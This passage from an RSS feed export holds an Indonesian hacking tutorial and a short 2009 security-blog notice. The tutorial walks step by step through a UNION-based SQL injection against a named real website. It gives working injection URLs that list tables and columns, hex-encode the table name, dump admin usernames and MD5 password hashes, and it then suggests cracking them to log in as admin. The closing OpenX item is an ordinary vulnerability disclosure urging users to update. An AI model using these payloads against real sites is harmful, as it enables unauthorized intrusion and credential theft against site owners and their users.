database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.</div>
</blockquote>
<p style="text-align:left;">
<p>langkah selanjutnya kita cari informasi table caranya</p>
<p style="text-align:left;">
<dl class="codebox">
<blockquote><dd><code>memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>penerapan dalam target kita</p>
<dl class="codebox">
<dt></dt>
<blockquote><dd><code>http://www.itmaasia.com<!--more-->0,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()--</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>nah muncul kan nama² tabel nya ada tabel admin tuh</p>
<p>langkah selanjutnya kita akan mengintip informasi di dalam table admin,</p>
<dl class="codebox">
<dt></dt>
<blockquote><dd><code>pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>penerapan dalam target kita</p>
<dl class="codebox">
<dt></dt>
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>oopppsss&#8230; error!<br />
table &#8216;admin&#8217; harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..<br />
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..</p>
<p>caranya masuk ke web ini</p>
<dl class="codebox">
<dt></dt>
<blockquote><dd><code>http://www.swingnote.com/tools/texttohex.php</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>trus di kolom string tulis tb_admin kemudian convert<br />
kemudian copy hexnya. lalu kita terapkan pada target kita</p>
<p style="text-align:left;">
<dl class="codebox">
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>keluarkan informasi dari tb_admin..<br />
langkah selanjutnya kita cari id_admin &#38; password caranya</p>
<dl class="codebox">
<dt></dt>
<blockquote><dd><code>group_concat(username,0x3a,password) tambahkan diakhir URL from admin</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>dimana 0&#215;3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..</p>
<p>penerapan dalam target kita</p>
<dl class="codebox">
<dt></dt>
<dd></dd>
</dl>
<blockquote><p><code>http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin</code></p></blockquote>
<p>wakakakakkak&#8230; dapet dech informasi login admin dan passwordnya..<br />
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. crack password md5 klo udah login sbgi admin.. ^^</p>
<p style="text-align:left;">
<p>selanjutnya terserah anda..</p>
<p>ingat ini hanya sebagai bahan belajar&#8230; jadi gunakanlah sebaik2nya</p>
<p style="text-align:left;">penulis tidak menanggung resiko yang terjadi</p>
<p style="text-align:left;">
<p style="text-align:left;">regards</p>
<p style="text-align:left;">~embr10~</p>
<p style="text-align:left;">thx to</p>
<p style="text-align:left;">Allah S.W.T, Nabi Muhammad SAW<span class="username-coloured" style="color:#003300;">, my family, </span></p>
<p style="text-align:left;"><span class="username-coloured" style="color:#003300;">Flyff 666</span>, mywisdom, <strong><span class="username-coloured" style="color:#003300;">Jambihackerlink</span></strong></p>
<p style="text-align:left;">all crew and member jasakom.com</p>
<p style="text-align:left;">all crew and member  echo.or.id</p>
<p style="text-align:left;">all crew and memberyogyafree.net</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple vulnerabilities in OpenX 2.6.4 and older]]></title>
<link>http://enablesecurity.com/2009/04/01/multiple-vulnerabilities-reported-in-openx-264-and-older/</link>
<pubDate>Wed, 01 Apr 2009 10:06:19 +0000</pubDate>
<dc:creator>Sandro</dc:creator>
<guid>http://enablesecurity.com/2009/04/01/multiple-vulnerabilities-reported-in-openx-264-and-older/</guid>
<description><![CDATA[Which means that if you are running OpenX, make sure to update to the latest version which was issue]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Which means that if you are running OpenX, make sure to update to the latest version which was issued just now. The latest download can be found <a href="http://www.openx.org/ad-server/download/" target="_blank">here.</a></p>
<p>We posted an <a href="http://resources.enablesecurity.com/advisories/openx-2.6.4-multiple.txt" target="_blank">advisory detailing</a> some well hidden SQL injection vulnerabilities as well as XSS, the possibility of arbitrary file deletion and CRLF injection. Additionally, we made available a video (below) on <a href="http://www.youtube.com/watch?v=kiNeiMS2Iu0" target="_blank">your favorite video sharing </a>site explaining how we were able to identify the flaws by making use of <a href="http://www.acunetix.com/blog/category/acusensor-technology/" target="_blank">Acunetix Acusensor</a> (not much skills involved there), analyze the flaws and eventually develop some code to exploit one of the blind SQL injection vulnerabilities. This exploit is not publicly available  but interested organizations can contact <a href="mailto:info@enablesecurity.com">info@enablesecurity.com</a> for further details.</p>
<p><span style='text-align:center; display: block;'><object width='425' height='350'><param name='movie' value='http://www.youtube.com/v/kiNeiMS2Iu0&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;hd=0' /><param name='allowfullscreen' value='true' /><param name='wmode' value='transparent' /><embed src='http://www.youtube.com/v/kiNeiMS2Iu0&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;hd=0' type='application/x-shockwave-flash' allowfullscreen='true' width='425' height='350' wmode='transparent'></embed></object></span></p>
</div>]]></content:encoded>
</item>

</channel>
</rss>
